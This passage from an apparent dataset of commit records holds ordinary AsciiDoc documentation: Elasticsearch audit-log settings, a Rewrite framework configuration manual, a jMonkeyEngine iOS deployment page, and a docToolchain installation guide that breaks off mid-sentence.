output\n\nThe `logfile` audit output is the default output for auditing. It writes data to\nthe `<clustername>_audit.log` file in the logs directory. To maintain\ncompatibility with releases prior to 6.5.0, a `<clustername>_access.log` file\nis also generated. They differ in the output format but the contents\nare similar. For systems that are not ingesting the audit file for search or\nanalytics it is strongly recommended to only keep the newer format.\nTurning off the deprecated output format can be achieved by disabling the logger\nin the `log4j2.properties` file (hint: there is a config comment\nabout it).\nFor more information, see {ref}\/logging.html#configuring-logging-levels[configuring-logging].\n\n\n[float]\n[[audit-log-entry-format]]\n=== Log entry format\n\nThe log entries in the `<clustername>_audit.log` file have the following format:\n\n- Each log entry is a one line JSON document and each one is printed on a separate line.\n- The fields of a log entry are ordered. However, if a field does not have a value it\n will not be printed. The precise line pattern, together with the complete field\n order, are specified in the `log4j2.properties` config file.\n- The log entry does not contain nested inner JSON objects, i.e. the doc is flat.\n- The field names follow a dotted notation to flatten inner objects.\n- A field's value can be a string, a number or an array of strings.\n- A field's value, a request body as well, will be escaped as per the JSON RFC 4627.\n\nThere is a list of <<audit-event-types, audit event types>> specifying the\nset of fields for each sog entry type.\n\n[float]\n[[deprecated-audit-log-entry-format]]\n=== Deprecated log entry format\n\nThe log entries in the `<clustername>_access.log` file have the following format:\n\n[source,txt]\n----------------------------------------------------------------------------\n[<timestamp>] [<local_node_info>] [<layer>] [<entry_type>] <attribute_list>\n----------------------------------------------------------------------------\n\n`<timestamp>` :: When the event occurred. You can configure the\n timestamp format in `log4j2.properties`.\n`<local_node_info>` :: Information about the local node that generated\n the log entry. You can control what node information\n is included by configuring the\n {ref}\/auditing-settings.html#node-audit-settings[local node info settings].\n`<layer>` :: The layer from which this event originated:\n `rest`, `transport` or `ip_filter`.\n`<entry_type>` :: The type of event that occurred: `anonymous_access_denied`,\n `authentication_failed`, `access_denied`, `access_granted`,\n `connection_granted`, `connection_denied`.\n`<attribute_list>` :: A comma-separated list of key-value pairs that contain\n data pertaining to the event. Formatted as\n `attr1=[val1], attr2=[val2]`. See <<audit-event-attributes,\n Audit Entry Attributes>> for the attributes that can be included\n for each type of event.\n\n[float]\n[[audit-log-settings]]\n=== Logfile output settings\n\nThe events and some other information about what gets logged can be\ncontrolled using settings in the `elasticsearch.yml` file. See\n{ref}\/auditing-settings.html#event-audit-settings[Audited Event Settings] and\n{ref}\/auditing-settings.html#node-audit-settings[Local Node Info Settings].\n\nIMPORTANT: No filtering is performed when auditing, so sensitive data may be\naudited in plain text when including the request body in audit events.\n\n[[logging-file]]\nYou can also configure how the logfile is written in the `log4j2.properties`\nfile located in `ES_PATH_CONF`. By default, audit information is appended to the\n`<clustername>_audit.log` file located in the standard Elasticsearch `logs` directory\n(typically located at `$ES_HOME\/logs`). The file rolls over on a daily basis.\nThe deprecated logfile audit format (`<clustername>_access.log`) can be disabled\nfrom the same `log4j2.properties` file (hint: look for the comment\ninstructing to set the log level to `off`). The deprecated format is a duplication\nof information that is in place to assure backwards compatibility. If you are\nnot strict about the audit format it is strongly recommended to only use the\n`<clustername>_audit.log` log appender.\n\n[float]\n[[audit-log-ignore-policy]]\n=== Logfile audit events ignore policies\n\nThe comprehensive audit trail is necessary to ensure accountability. It offers tremendous\nvalue during incident response and can even be required for demonstrating compliance.\n\nThe drawback of an audited system is represented by the inevitable performance penalty incurred.\nIn all truth, the audit trail spends _I\/O ops_ that are not available anymore for the user's queries.\nSometimes the verbosity of the audit trail may become a problem that the event type restrictions,\n<<audit-log-settings, defined by `include` and `exclude`>>, will not alleviate.\n\n*Audit events ignore policies* are a finer way to tune the verbosity of the audit trail.\nThese policies define rules that match audit events which will be _ignored_ (read as: not printed).\nRules match on the values of attributes of audit events and complement the <<audit-log-settings, include\/exclude>> method.\nImagine the corpus of audit events and the policies chopping off unwanted events.\n\nIMPORTANT: When utilizing audit events ignore policies you are acknowledging potential\naccountability gaps that could render illegitimate actions undetectable.\nPlease take time to review these policies whenever your system architecture changes.\n\nA policy is a named set of filter rules. Each filter rule applies to a single event attribute,\none of the `users`, `realms`, `roles` or `indices` attributes. The filter rule defines\na list of {ref}\/query-dsl-regexp-query.html#regexp-syntax[Lucene regexp], *any* of which has to match the value of the audit\nevent attribute for the rule to match.\nA policy matches an event if *all* the rules comprising it match the event.\nAn audit event is ignored, therefore not printed, if it matches *any* policy. All other\nnon-matching events are printed as usual.\n\nAll policies are defined under the `xpack.security.audit.logfile.events.ignore_filters`\nsettings namespace. For example, the following policy named _example1_ matches\nevents from the _kibana_ or _admin_user_ principals **and** operating over indices of the\nwildcard form _app-logs*_:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n example1:\n users: [\"kibana\", \"admin_user\"]\n indices: [\"app-logs*\"]\n----------------------------\n\nAn audit event generated by the _kibana_ user and operating over multiple indices\n, some of which do not match the indices wildcard, will not match.\nAs expected, operations generated by all other users (even operating only on indices that\nmatch the _indices_ filter) will not match this policy either.\n\nAudit events of different types may have <<audit-event-attributes, different attributes>>.\nIf an event does not contain an attribute for which some policy defines filters, the\nevent will not match the policy.\nFor example, the following policy named _example2_, will never match `authentication_success` or\n`authentication_failed` events, irrespective of the user's roles, because these\nevent schemas do not contain the `role` attribute:\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n example2:\n roles: [\"admin\", \"ops_admin_*\"]\n----------------------------\n\nLikewise, any events of users with multiple roles, some of which do not match the\nregexps will not match this policy.\n\nFor completeness, although practical use cases should be sparse, a filter can match\na missing attribute of an event, using the empty string (\"\") or the empty list ([]).\nFor example, the following policy will match events that do not have the `indices`\nattribute (`anonymous_access_denied`, `authentication_success` and other types) as well\nas events over the _next_ index.\n\n[source,yaml]\n----------------------------\nxpack.security.audit.logfile.events.ignore_filters:\n example3:\n indices: [\"next\", \"\"]\n----------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4af0f5250fd78c334a46ede6348e7dd314f6f6f3","subject":"Remove javadoc syntax","message":"Remove javadoc syntax\n","repos":"chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,jsight\/rewrite,jsight\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,chkal\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,ocpsoft\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/configuration\/index.asciidoc","new_contents":"== Rewrite Configuration Manual\n\nThere are many types of configuration objects in link:..\/[Rewrite], so we will take a few moments to define a few of the core terms before continuing to more advanced topics. Most of the core objects can be found in the +org.ocpsoft.rewrite.config+ package, while Servlet specific objects can be found in the +org.ocpsoft.rewrite.servlet.config+ package.\n\n=== Download and install\n\nBefore continuing on to learn about configuring Rewrite, make sure that you have already followed the link:.\/install[installation guide]. This will ensure that Rewrite is successfully set up in your application.\n\n=== The terminology\n\nIt may be helpful to review the following terms, many of which will make frequent appearances in this documentation.\n\nConfigurationProvider:: An object that provides +Configuration+ instances to the Rewrite framework; these may be created and registered as necessary. If not using link:.\/annotations\/index[Rewrite Annotations], or other extensions, you must have at least one registered +ConfigurationProvider+ or Rewrite will not have any effect.\n\nConfiguration:: A collection of +Rule+ objects that are processed in order until the system has determined the current inbound or oubound Rewrite event has been handled. Configurations may be provided by extensions, cached for performance, or built dynamically at run-time.\n\nConfigurationBuilder:: This is likely the object you will interact with most when configuring the Rewrite system. Start with a +ConfigurationBuilder+ in each situation where you find yourself in need of a +Configuration+ object; this class may be used to add pre-constructed, or contruct custom +Rule+ instances for Rewrite.\n\nCondition:: Defines a requirement that must be met in order for rule evaluation to return true. You may create custom +Condition+ implementations. If creating custom implementations, you should likely extend +DefaultConditionBuilder+, which adds logical operators +.and()+, +.or()+, and +.not()+.\n\nOperation:: Defines behavior to be performed after evaluation a +Rewrite+ event. These objects may be as simple or as complex as desired, ranging from simple logging to request forwarding. Typically +Operation+ instances may be chained to achieve more complex tasks. If creating custom umplementations, you should likely extend +DefaultOperationBuilder+, which adds logical chaining via +.and()+.\n\nParameter:: Specifies a fragment of an HTTP request that may be referenced in both +Condition+ and +Operation+ instances. Parameters are defined using the +.where()+ method of the +ConfigurationBuilder+, which is available once the first +Rule+ (with conditions or operations) has been added.\n\nRule:: A pre-constructed combination of +Condition+ and +Operation+ instances. You should use a +Rule+ when simple composition of +Condition+ and +Operation+ instances in a +ConfigurationBuilder+ is too difficult to achieve the desired functionality.\n\n=== Activate Development Mode\nBy default, Rewrite uses a +ConfigurationCacheProvider+ that stores your configuration in the +ServletContext+ as an application-wide caching medium. This means, by default, all registered +ConfigurationProvider+ instances will be loaded once upon application startup, and never again.\n\nTo disable the default caching mechanism, and enable configuration reloading on each request, add the following servlet context init parameter to <code>web.xml<\/code>:\n\n[source,xml]\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.config.CONFIG_RELOADING<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n----\nMake sure to disable this option before deploying to production, since larger and more complex configurations may take some time to re-load.\n\n=== Start using Rewrite rules\n\nNow that you have Rewrite installed, and understand the basic terms, let's start writing some rules. We will start with a simple example: logging an inbound request URL to the server console.\n\nFirst, open the +ConfigurationProvider+ you defined during link:install[installation] and add the desired logging statement using the +.addRule()+ method of +ConfigurationBuilder+.\n\n[source,java]\n.Log an inbound request to the server console\n----\npublic class ApplicationConfigurationProvider extends HttpConfigurationProvider\n{\n\n @Override\n public Configuration getConfiguration(ServletContext context)\n {\n return ConfigurationBuilder.begin()\n .addRule()\n .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n .where(\"path\").matches(\".*\");\n }\n\n}\n----\n\nBy default, parameters defined within the +Path+ condition match all characters except for forward slash \"+\/+\". To change this, we must configure the parameter manually. Once complete, our rule matches any inbound request, with any number of path segments.\n\nTIP: Parameter configuration can be used any time when parameters have been specified using the +ConfigurationBuilder+.\n\n[source,console]\n.Log output\n----\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\/bar\n...\n----\n\n[NOTE] \n====\nIf you attempt to configure a parameter that does not exist, you will quickly find out upon application startup; your deployment will halt on exception:\n\n[source,console]\n----\n.where(\"foo\").matches(\".*\");\n...\njava.lang.IllegalArgumentException: No such parameter [ foo ] exists.\n----\n====\n\n==== A closer look\n\nNow that we have written a rule that uses a few different +Operation+ and +Condition+ objects, lets take a look at how the interaction works - we will break down the entire rule:\n\n[source,java]\n----\nConfigurationBuilder.begin()\n .addRule()\n .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n .where(\"path\").matches(\".*\");\n----\n\n===== The breakdown\n+ConfigurationBuilder.begin().addRule()+:: Begins a new fluent +Configuration+ object and adds a fluent +Rule+\n\n`.when(Direction.isInbound().and(Path.matches(\"\/{path}\")))`:: Specifies that the rule should match only on inbound requests, and only when the request path matches the pattern `\/[^\/]+`, which is specified by our use of the parameter `{path}`\n\n`.perform(Log.message(Level.INFO, \"Client requested path: {path}\"))`:: Specify the +Operation+ to be performed when all conditions are met. Operations may be chained using the +.and()+ method available on most operation instances.\n\n`.where(\"path\").matches(\".*\")`:: Configures the +Parameter+ named \"+path+\", and specifies that it must match the link:http:\/\/ocpsoft.org\/opensource\/guide-to-regular-expressions-in-java-part-1\/[regular expression] pattern \"+.*+\"\n\n==== Add another operation\n\nNow say we wish to forward each inbound request to a Servlet or JSP that will handle the request and render a response for the client. We can achieve this by adding the +Forward+ operation to the set of operations to be performed when all rule conditions have been met. Forwards are purely internal operations, and the client browser URL will not be updated.\n\n[source,java]\n----\nConfigurationBuilder.begin()\n .addRule()\n .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n .perform(Log.message(Level.INFO, \"Client requested path: {path}\")\n .and(Forward.to(\"\/Servlet?path={path}\")))\n .where(\"path\").matches(\".*\");\n----\n\nNotice that we have specified a new Operation: +Forward.to(\"\/Servlet?path={path}\")+; this will again re-use the \"+path+\" parameter. The example below demonstrates how an inbound request will be forwarded to an inbound resource.\n\nTIP: Operations are performed in the order in which they are added to the rule, so make sure that breaking operations such as +Forward+, +Redirect+, +Substitute+, and +Lifecycle+ are added last, or your +Operation+ may not be performed.\n\n\n","old_contents":"== Rewrite Configuration Manual\n\nThere are many types of configuration objects in link:..\/[Rewrite], so we will take a few moments to define a few of the core terms before continuing to more advanced topics. Most of the core objects can be found in the +org.ocpsoft.rewrite.config+ package, while Servlet specific objects can be found in the +org.ocpsoft.rewrite.servlet.config+ package.\n\n=== Download and install\n\nBefore continuing on to learn about configuring Rewrite, make sure that you have already followed the link:.\/install[installation guide]. This will ensure that Rewrite is successfully set up in your application.\n\n=== The terminology\n\nIt may be helpful to review the following terms, many of which will make frequent appearances in this documentation.\n\nConfigurationProvider:: An object that provides +Configuration+ instances to the Rewrite framework; these may be created and registered as necessary. If not using link:.\/annotations\/index[Rewrite Annotations], or other extensions, you must have at least one registered +ConfigurationProvider+ or Rewrite will not have any effect.\n\nConfiguration:: A collection of +Rule+ objects that are processed in order until the system has determined the current inbound or oubound Rewrite event has been handled. Configurations may be provided by extensions, cached for performance, or built dynamically at run-time.\n\nConfigurationBuilder:: This is likely the object you will interact with most when configuring the Rewrite system. Start with a +ConfigurationBuilder+ in each situation where you find yourself in need of a +Configuration+ object; this class may be used to add pre-constructed, or contruct custom +Rule+ instances for Rewrite.\n\nCondition:: Defines a requirement that must be met in order for rule evaluation to return true. You may create custom +Condition+ implementations. If creating custom implementations, you should likely extend +DefaultConditionBuilder+, which adds logical operators +.and()+, +.or()+, and +.not()+.\n\nOperation:: Defines behavior to be performed after evaluation a +Rewrite+ event. These objects may be as simple or as complex as desired, ranging from simple logging to request forwarding. Typically +Operation+ instances may be chained to achieve more complex tasks. If creating custom umplementations, you should likely extend +DefaultOperationBuilder+, which adds logical chaining via +.and()+.\n\nParameter:: Specifies a fragment of an HTTP request that may be referenced in both +Condition+ and +Operation+ instances. Parameters are defined using the +.where()+ method of the +ConfigurationBuilder+, which is available once the first +Rule+ (with conditions or operations) has been added.\n\nRule:: A pre-constructed combination of +Condition+ and +Operation+ instances. You should use a +Rule+ when simple composition of +Condition+ and +Operation+ instances in a +ConfigurationBuilder+ is too difficult to achieve the desired functionality.\n\n=== Activate Development Mode\nBy default, Rewrite uses a +ConfigurationCacheProvider+ that stores your configuration in the +ServletContext+ as an application-wide caching medium. This means, by default, the +Configuration+ will be loaded once upon application startup, and never again.\n\nTo disable the default caching mechanism, and enable +Configuration+ reloading on each request, add the following servlet context init parameter to <code>web.xml<\/code>:\n\n[source,xml]\n----\n<context-param>\n <param-name>org.ocpsoft.rewrite.config.CONFIG_RELOADING<\/param-name>\n <param-value>true<\/param-value>\n<\/context-param>\n----\nMake sure to disable this option before deploying to production, since larger and more complex configurations may take some time to re-load.\n\n=== Start using Rewrite rules\n\nNow that you have Rewrite installed, and understand the basic terms, let's start writing some rules. We will start with a simple example: logging an inbound request URL to the server console.\n\nFirst, open the +ConfigurationProvider+ you defined during link:install[installation] and add the desired logging statement using the +.addRule()+ method of +ConfigurationBuilder+.\n\n[source,java]\n.Log an inbound request to the server console\n----\npublic class ApplicationConfigurationProvider extends HttpConfigurationProvider\n{\n\n @Override\n public Configuration getConfiguration(ServletContext context)\n {\n return ConfigurationBuilder.begin()\n .addRule()\n .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n .where(\"path\").matches(\".*\");\n }\n\n}\n----\n\nBy default, parameters defined within the +Path+ condition match all characters except for forward slash \"+\/+\". To change this, we must configure the parameter manually. Once complete, our rule matches any inbound request, with any number of path segments.\n\nTIP: Parameter configuration can be used any time when parameters have been specified using the +ConfigurationBuilder+.\n\n[source,console]\n.Log output\n----\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\nINFO [org.ocpsoft.config.Log] Client requested path: \/foo\/bar\n...\n----\n\n[NOTE] \n====\nIf you attempt to configure a parameter that does not exist, you will quickly find out upon application startup; your deployment will halt on exception:\n\n[source,console]\n----\n.where(\"foo\").matches(\".*\");\n...\njava.lang.IllegalArgumentException: No such parameter [ foo ] exists.\n----\n====\n\n==== A closer look\n\nNow that we have written a rule that uses a few different +Operation+ and +Condition+ objects, lets take a look at how the interaction works - we will break down the entire rule:\n\n[source,java]\n----\nConfigurationBuilder.begin()\n .addRule()\n .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n .perform(Log.message(Level.INFO, \"Client requested path: {path}\"))\n .where(\"path\").matches(\".*\");\n----\n\n===== The breakdown\n+ConfigurationBuilder.begin().addRule()+:: Begins a new fluent +Configuration+ object and adds a fluent +Rule+\n\n`.when(Direction.isInbound().and(Path.matches(\"\/{path}\")))`:: Specifies that the rule should match only on inbound requests, and only when the request path matches the pattern `\/[^\/]+`, which is specified by our use of the parameter `{path}`\n\n`.perform(Log.message(Level.INFO, \"Client requested path: {path}\"))`:: Specify the +Operation+ to be performed when all conditions are met. Operations may be chained using the +.and()+ method available on most operation instances.\n\n`.where(\"path\").matches(\".*\")`:: Configures the +Parameter+ named \"+path+\", and specifies that it must match the link:http:\/\/ocpsoft.org\/opensource\/guide-to-regular-expressions-in-java-part-1\/[regular expression] pattern \"+.*+\"\n\n==== Add another operation\n\nNow say we wish to forward each inbound request to a Servlet or JSP that will handle the request and render a response for the client. We can achieve this by adding the +Forward+ operation to the set of operations to be performed when all rule conditions have been met. Forwards are purely internal operations, and the client browser URL will not be updated.\n\n[source,java]\n----\nConfigurationBuilder.begin()\n .addRule()\n .when(Direction.isInbound().and(Path.matches(\"\/{path}\")))\n .perform(Log.message(Level.INFO, \"Client requested path: {path}\")\n .and(Forward.to(\"\/Servlet?path={path}\")))\n .where(\"path\").matches(\".*\");\n----\n\nNotice that we have specified a new Operation: +Forward.to(\"\/Servlet?path={path}\")+; this will again re-use the \"+path+\" parameter. The example below demonstrates how an inbound request will be forwarded to an inbound resource.\n\nTIP: Operations are performed in the order in which they are added to the rule, so make sure that breaking operations such as +Forward+, +Redirect+, +Substitute+, and +Lifecycle+ are added last, or your +Operation+ may not be performed.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4cb9b37f9d8df19db62e9e929d5c7b7ec38aafc8","subject":"Update ios.adoc","message":"Update ios.adoc\n\nBroke long monospace into 2 lines.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/ios.adoc","new_file":"src\/docs\/asciidoc\/jme3\/ios.adoc","new_contents":"= ios\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, iOS, Mac, MacOS, deployment, platform\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== iOS Deployment\n\nTo use iOS deployment you need a computer running MacOSX and a version of Xcode 4.0+ installed. To deploy to a device or the Apple App Store, you need an Apple developer account.\n\n\n[WARNING]\n====\nNote that at the moment iOS deployment is in alpha state.\n====\n\n\niOS deployment works via cross-compilation to native iOS ARM code, there is no virtual machine running on the device. The Avian JVM supports this feature while maintaining general compatibility to OpenJDK and JNI for native access. The minimum compatible iOS deployment target is 4.3.\n\n\n[TIP]\n====\nTo install the iOS deployment plugin, go to Tools\u2192Plugins and under \u201cAvailable plugins select the \u201ciOS Support plugin.\n====\n\n\n\n=== Enabling iOS deployment\n\nTo enable iOS deployment, go to the project settings and under \u201cApplication\u2192iOS select the \u201cEnable iOS deployment checkbox, adapt the application ID and then press OK.\n\nimage:jme3\/ios-deployment.png[ios-deployment.png,width=\"\",height=\"\"]\n\nAfter enabling deployment, a new `ios` directory is created in the project root that contains a `project` and a `src` folder. The `ios\/project` folder contains an Xcode project that you will use to build and run the final iOS application for both iPhone and iOS. The `ios\/src` folder contains java and native source files for bridging iOS and native code, you can add .java and .m files with your own iOS code here.\n\n\n[IMPORTANT]\n====\nWhen you enable iOS deployment for the first time or any time that the Avian library and OpenJDK is updated, they will be extracted to your SDK settings folder, wait until it has been extracted before building an iOS-enabled project.\n====\n\n\n\n=== Building the iOS binaries\n\nThe iOS binaries are automatically built when you have iOS deployment enabled and build your project in the jME3 SDK.\n\nWhen the iOS binaries are built, all needed classes, including a complete copy of the OpenJDK7 classes are run through a proguard process that strips out the unnecessary classes for the project and optimizes the code for the platform. This happens without changing the naming structure so that reflection etc. still works. If necessary, adapt the proguard options in the ios properties file.\n\nAfter the iOS classpath has been created the avian compiler is used to create a native .o file from the classpath for both arm (device) and i386 (simulator). Furthermore the other needed avian .o files are extracted and a library list is compiled which is referenced in the Xcode project.\n\nIf an error occurs about jni.h not being found, either install the SDK for 10.9 in XCode or set the header search path in the XCode project settings, in the default project thats +\n`\/Applications\/Xcode.app\/Contents\/Developer\/Platforms\/MacOSX.platform\/Developer\/` +\n`SDKs\/MacOSX10.9.sdk\/System\/Library\/Frameworks\/JavaVM.framework\/Headers\/`\n\n\n=== Running and deploying the application\n\nTo run the application, open the Xcode project under `ios\/project` in Xcode and press the run button. You can make changes to the UI and native invocation classes in the Xcode project as well. From here you can also deploy the application to your devices or the App Store.\n\n[TIP]\n====\nNote that you should also adapt the project settings like application name and registration package in Xcode before deploying the final application.\n====\n\n\n\n=== Creating native and java code for iOS\n\nTo bridge between native and java code, JNI is used like in a normal java application. The `ios\/src` folder is for Java and C\/Obj-C source files that are specific to your iOS application. In these java files you have access to the full project classpath as well as the iOS-specific jME3 classes.\n\nThe JmeAppHarness.java class is initialized and called from native code through the default project and you can extend it to perform other native operations. It has a simple native popup method. The JmeAppHarness.m file contains the native method needed for that popup.\n\nEffectively native code can reside in both the Xcode project and in the `ios\/src` folder. To keep the dependencies clean and make code reusable you should try to put generic native code that does not depend on the Xcode project in the `ios\/src` folder. You can also mix and match ARC and non-ARC code through this by converting the main project to use ARC and putting code with manual memory management in the `ios\/src` folder.\n\nJava code for iOS should be in the `ios\/src` folder as well for clean separation, its also the only place where they will be compiled with a reference to the iOS specific jME classes. For information on how to connect your application code and device specific code, see the <<jme3\/android#using_android_specific_functions,notes in the android deployment documentation>>.\n","old_contents":"= ios\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: documentation, iOS, Mac, MacOS, deployment, platform\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== iOS Deployment\n\nTo use iOS deployment you need a computer running MacOSX and a version of Xcode 4.0+ installed. To deploy to a device or the Apple App Store, you need an Apple developer account.\n\n\n[WARNING]\n====\nNote that at the moment iOS deployment is in alpha state.\n====\n\n\niOS deployment works via cross-compilation to native iOS ARM code, there is no virtual machine running on the device. The Avian JVM supports this feature while maintaining general compatibility to OpenJDK and JNI for native access. The minimum compatible iOS deployment target is 4.3.\n\n\n[TIP]\n====\nTo install the iOS deployment plugin, go to Tools\u2192Plugins and under \u201cAvailable plugins select the \u201ciOS Support plugin.\n====\n\n\n\n=== Enabling iOS deployment\n\nTo enable iOS deployment, go to the project settings and under \u201cApplication\u2192iOS select the \u201cEnable iOS deployment checkbox, adapt the application ID and then press OK.\n\nimage:jme3\/ios-deployment.png[ios-deployment.png,width=\"\",height=\"\"]\n\nAfter enabling deployment, a new `ios` directory is created in the project root that contains a `project` and a `src` folder. The `ios\/project` folder contains an Xcode project that you will use to build and run the final iOS application for both iPhone and iOS. The `ios\/src` folder contains java and native source files for bridging iOS and native code, you can add .java and .m files with your own iOS code here.\n\n\n[IMPORTANT]\n====\nWhen you enable iOS deployment for the first time or any time that the Avian library and OpenJDK is updated, they will be extracted to your SDK settings folder, wait until it has been extracted before building an iOS-enabled project.\n====\n\n\n\n=== Building the iOS binaries\n\nThe iOS binaries are automatically built when you have iOS deployment enabled and build your project in the jME3 SDK.\n\nWhen the iOS binaries are built, all needed classes, including a complete copy of the OpenJDK7 classes are run through a proguard process that strips out the unnecessary classes for the project and optimizes the code for the platform. This happens without changing the naming structure so that reflection etc. still works. If necessary, adapt the proguard options in the ios properties file.\n\nAfter the iOS classpath has been created the avian compiler is used to create a native .o file from the classpath for both arm (device) and i386 (simulator). Furthermore the other needed avian .o files are extracted and a library list is compiled which is referenced in the Xcode project.\n\nIf an error occurs about jni.h not being found, either install the SDK for 10.9 in XCode or set the header search path in the XCode project settings, in the default project thats +\n`\/Applications\/Xcode.app\/Contents\/Developer\/Platforms\/MacOSX.platform\/Developer\/SDKs\/MacOSX10.9.sdk\/System\/Library\/Frameworks\/JavaVM.framework\/Headers\/`\n\n\n=== Running and deploying the application\n\nTo run the application, open the Xcode project under `ios\/project` in Xcode and press the run button. You can make changes to the UI and native invocation classes in the Xcode project as well. From here you can also deploy the application to your devices or the App Store.\n\n[TIP]\n====\nNote that you should also adapt the project settings like application name and registration package in Xcode before deploying the final application.\n====\n\n\n\n=== Creating native and java code for iOS\n\nTo bridge between native and java code, JNI is used like in a normal java application. The `ios\/src` folder is for Java and C\/Obj-C source files that are specific to your iOS application. In these java files you have access to the full project classpath as well as the iOS-specific jME3 classes.\n\nThe JmeAppHarness.java class is initialized and called from native code through the default project and you can extend it to perform other native operations. It has a simple native popup method. The JmeAppHarness.m file contains the native method needed for that popup.\n\nEffectively native code can reside in both the Xcode project and in the `ios\/src` folder. To keep the dependencies clean and make code reusable you should try to put generic native code that does not depend on the Xcode project in the `ios\/src` folder. You can also mix and match ARC and non-ARC code through this by converting the main project to use ARC and putting code with manual memory management in the `ios\/src` folder.\n\nJava code for iOS should be in the `ios\/src` folder as well for clean separation, its also the only place where they will be compiled with a reference to the iOS specific jME classes. For information on how to connect your application code and device specific code, see the <<jme3\/android#using_android_specific_functions,notes in the android deployment documentation>>.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"42817b584de3c08aa6e617890c7762029cba2512","subject":"two additional fixes","message":"two additional fixes","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/02_install.adoc","new_file":"src\/docs\/manual\/02_install.adoc","new_contents":":filename: manual\/02_install.adoc\n\n= How to install docToolchain\n\ninclude::feedback.adoc[]\n\n== Get the tool\n\nTo start with docToolchain you need to get a copy of the current docToolchain repository.\nThe easiest way is to clone the repository without history and remove the `.git` folder:\n\n.Linux with git clone\n[source,bash]\n----\ngit clone --recursive https:\/\/github.com\/docToolchain\/docToolchain.git <docToolchain home>\nrm -rf .git\nrm -rf resources\/asciidoctor-reveal.js\/.git\nrm -rf resources\/reveal.js\/.git\n----\n\n`--recursive` option is required because the repository contains 2 submodules - `resources\/asciidoctor-reveal.js` and `resources\/reveal.js`.\n\nAnother way is to download the zipped git repository and rename it:\n\n.Linux with download as zip\n[source, bash]\n----\nwget https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip\nunzip master.zip\n\n# fetching dependencies\n\ncd docToolchain-master\/resources\n\nrm -d reveal.js\nwget https:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip -O reveal.js.zip\nunzip reveal.js.zip\nmv reveal.js-tags-3.3.0 reveal.js\n\nrm -d asciidoctor-reveal.js\nwget https:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip -O asciidoctor-reveal.js.zip\nunzip asciidoctor-reveal.js.zip\nmv asciidoctor-reveal.js-9667f5c5d926b3be48361d6d6413d3896954894c asciidoctor-reveal.js\n\nmv docToolchain-master <docToolchain home>\n----\n\n\nIf you work (like me) on a Windows environment, just download and unzip the https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip[repository] as well as its dependencies:\nhttps:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip[reveal.js] and\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip[asciidoctor-reveal.js].\n\nAfter unzipping, put the dependencies in `resources` folder, so that the structure is the same as on https:\/\/github.com\/docToolchain\/docToolchain\/tree\/master\/resources[GitHub].\n\n\/\/[source]\n\/\/----\n\/\/(New-Object\u00a0Net.WebClient).DownloadFile('https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip','master.zip')\n\/\/----\n\nYou can add <docToolchain home>\/bin to your PATH or you can run doctoolchain with full path if you prefer.\n\n== Initialize directory for documents\n\nThe next step after getting docToolchain is to initialize a directory where your documents live. In docToolchain this\ndirectory is named \"newDocDir\" during initialization, or just \"docDir\" later on.\n\n=== Existing documents\n\nIf you already have some existing documents in AsciiDoc format in your project, you need to put the configuration\nfile there to inform docToolchain what and how to process. You can do that manually by copying the contents of\ntemplate_config directory. You can also do that by running `initExisting` task.\n\n.Linux initExisting example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initExisting -PnewDocDir=<your directory>\n----\n\nYou need to open Config.groovy file and configure names of your files properly.\nYou may also change the PDF schema file to your taste.\n\n=== arc42 from scratch\n\nIf you don't have existing documents yet, or if you need a fresh start, you can get the https:\/\/arc42.org[arc42] template in AsciiDoc\nformat. You can do that by manually downloading from https:\/\/arc42.org\/download. You can also to that by running\n`initArc42<language>` task. Currently supported languages are:\n\n- DE - German\n- EN - English\n- ES - Spanish\n- RU - Russian\n\n.Linux initArc42EN example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initArc42EN -PnewDocDir=<newDocDir>\n----\n\nThe 